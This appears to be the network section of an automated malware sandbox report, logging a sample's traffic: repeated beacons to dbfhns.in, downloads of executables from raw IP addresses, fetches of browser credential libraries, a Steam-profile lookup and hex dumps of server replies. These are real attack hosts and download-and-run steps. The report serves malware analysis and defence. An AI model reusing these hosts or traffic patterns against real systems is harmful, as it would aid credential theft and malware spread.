Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hfcngeudnubrryg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: dbfhns.in
Source: global traffic HTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
Source: global traffic HTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fgaaagvpavk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qvvaotfskdoxlio.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: dbfhns.in
Source: global traffic HTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ipxqunnvdoai.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xrjlnlbrgajqsny.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uopupolbajboxnf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://imsuruvsrfypw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uvpyitsqtsmmqygu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yowyackmlvbjrxy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jkbknieekjatcp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://txclniyqjcys.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kmtbjhmhexqkn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jsnmddlhyunj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eamimphmsadwkq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://anyyjopgfajdv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tlfkitushftrjirb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://plbuqwbmoldqvnm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tjxcjquxocrwkw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wmlhlokjcexweyx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vjusdpgryce.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ajfprnyfteagngdf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nqimnaeauxblwda.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: dbfhns.in
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9FCC60 PR_Recv, 13_2_6C9FCC60
Source: global traffic HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
Source: global traffic HTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
Source: global traffic HTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
Source: global traffic HTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: dbfhns.in
Source: global traffic DNS traffic detected: DNS query: whispedwoodmoodsksl.shop
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ec Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:15 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1 Data Ascii: #\-^$aD++3^|
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
